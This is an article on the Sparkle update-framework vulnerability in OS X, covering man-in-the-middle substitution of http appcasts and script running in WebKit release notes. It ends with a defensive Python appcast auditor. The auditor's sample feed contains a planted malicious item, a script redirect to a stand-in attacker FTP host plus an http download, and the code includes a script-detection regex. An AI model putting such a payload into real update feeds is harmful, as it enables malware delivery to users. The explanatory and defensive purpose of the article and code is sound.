The drumbeat of avoiding insecure "http" web connections beats ever louder. A researcher disclosed several days ago a vulnerability hiding in plain sight in the Sparkle update framework for OS X Yosemite and El Capitan. Because Sparkle allows apps to update via non-encrypted web connections, the potential for sending malicious updates through man-in-the-middle attacks is quite high. But the attack works because of three separate OS X issues: executing JavaScript in WebKit views intended to show formatted text; mounting FTP servers on the desktop; and Gatekeeper not checking certain paths and kinds of downloaded files. (Reported first on the researcher's post, which went up in late January.)

The Sparkle project coordinators have already released an update that disables the vectors under their control, although the OS X issues still exist; they are just much harder to take advantage of without Sparkle providing a pathway. App developers who still use http for Sparkle connections need to update their software and release new versions with https immediately, and ultimately (and soon) incorporate the newest Sparkle release.

This free, open-source code module was initially created by a single developer in 2006 (it has since been handed off to a team) as a way to give in-app updates the ease of an app store: instead of having to check for updates or be on a mailing list about them, then download a new release from a website and run an installer, Sparkle automates all of that within the program. Apps can offer a preference to check for updates automatically on a schedule, as well as a manual Check for Updates option. The Sparkle framework fetches an XML-based update feed hosted at the app developer's site, and whenever a release number in the feed is higher than the current version, it notifies the user with release notes and offers a one-click operation to download the update, quit the app, install it, and relaunch.

Researcher Radosław Karpowicz (who goes by Radek) discovered two separate vulnerabilities. The first is that developers using Sparkle with http instead of https allow a man-in-the-middle (MitM) attack, in which a malicious party can redirect or alter the request without detection, unlike with https. MitM against an unencrypted connection just requires a position where traffic can be examined and substituted. This can happen on a public Wi-Fi network, on business networks that lack good internal controls, and at higher-level Internet hubs when malicious parties gain access to them or governments demand access to or control over them.

Karpowicz notes that an attacker in that position could return an alternate XML update file in response to a Sparkle check. That suborned response not only could show false information and lead people to install malware, but it can also take advantage of a second vulnerability, this one in OS X's WebKit, which Sparkle uses to display formatted update information in a pop-up window inside the app. The XML file's update payload can include JavaScript that is directly executed in that WebKit window, which can open a browser and run code that loads a webpage hosting zero-day exploits that have not yet been patched.
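As an added example (not Sparkle's own code and not from the researcher's post), here is a small Python checker that mirrors what an updater should refuse to do given the two vulnerabilities described above: it parses a Sparkle-style appcast, picks the newest version above the running one, and rejects any candidate whose feed or download URL is not https or whose release notes carry script content. The element layout follows Sparkle's appcast format (RSS items whose `<enclosure>` carries a `sparkle:version` attribute); the feed text, host names and version numbers are constructed for the example.

```python
"""Audit a Sparkle-style appcast for the weaknesses the article describes.

Added example, not code from Sparkle or from the researcher's post. The
feed text, host names and versions below are constructed for illustration;
the element layout follows Sparkle's appcast format (RSS items whose
<enclosure> carries a sparkle:version attribute).
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

SPARKLE_NS = "http://www.andymatuschak.org/xml-namespaces/sparkle"

# Constructed sample feed: one benign item, plus one of the kind a MitM
# attacker could splice into a feed fetched over plain http (a huge version
# number so it "wins", an http download, and script in the release notes).
SAMPLE_APPCAST = """<rss version="2.0" xmlns:sparkle="%s">
  <channel>
    <item>
      <title>Version 2.1.0</title>
      <description><![CDATA[<p>Bug fixes.</p>]]></description>
      <enclosure url="https://example.invalid/app-2.1.0.zip"
                 sparkle:version="2.1.0" length="1024"
                 type="application/octet-stream"/>
    </item>
    <item>
      <title>Version 9.9.9</title>
      <description><![CDATA[<script>window.location='ftp://attacker.invalid/';</script>]]></description>
      <enclosure url="http://attacker.invalid/app.zip"
                 sparkle:version="9.9.9" length="1024"
                 type="application/octet-stream"/>
    </item>
  </channel>
</rss>
""" % SPARKLE_NS

# Markup that would make a WebKit view run code instead of merely rendering text.
SCRIPT_RE = re.compile(r"<\s*script\b|\bjavascript:|\bon\w+\s*=", re.IGNORECASE)


def parse_version(text):
    """'2.1.0' -> (2, 1, 0), so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def parse_appcast(xml_text):
    """Return one dict per <item> that carries an <enclosure>."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        enclosure = item.find("enclosure")
        if enclosure is None:
            continue
        items.append({
            "version": enclosure.get("{%s}version" % SPARKLE_NS),
            "url": enclosure.get("url"),
            "notes": item.findtext("description") or "",
        })
    return items


def audit_item(item, feed_url):
    """List the reasons this candidate must not be installed (empty list = OK)."""
    problems = []
    if urlparse(feed_url).scheme != "https":
        problems.append("feed fetched over http: a MitM can substitute the XML")
    if urlparse(item["url"]).scheme != "https":
        problems.append("enclosure URL is not https")
    if SCRIPT_RE.search(item["notes"]):
        problems.append("release notes contain script or event-handler markup")
    return problems


def newest_acceptable(xml_text, feed_url, current_version):
    """Pick the highest version above current_version that passes audit_item.

    Returns (item_or_None, rejected) where rejected maps version -> problems.
    """
    current = parse_version(current_version)
    candidates = [i for i in parse_appcast(xml_text)
                  if parse_version(i["version"]) > current]
    candidates.sort(key=lambda i: parse_version(i["version"]), reverse=True)
    rejected = {}
    for item in candidates:
        problems = audit_item(item, feed_url)
        if not problems:
            return item, rejected
        rejected[item["version"]] = problems
    return None, rejected


if __name__ == "__main__":
    for feed in ("http://example.invalid/appcast.xml",
                 "https://example.invalid/appcast.xml"):
        chosen, rejected = newest_acceptable(SAMPLE_APPCAST, feed, "2.0.0")
        print(feed, "->", chosen["version"] if chosen else None, rejected)
```

Run as-is, the http feed yields no acceptable update at all (every item is tainted by the substitutable transport), while the https feed yields 2.1.0 and reports why the planted 9.9.9 item was thrown out. This is only the transport and rendering side of the problem; it does not replace verifying a signature on the downloaded update, which Sparkle supports separately and which the article does not cover.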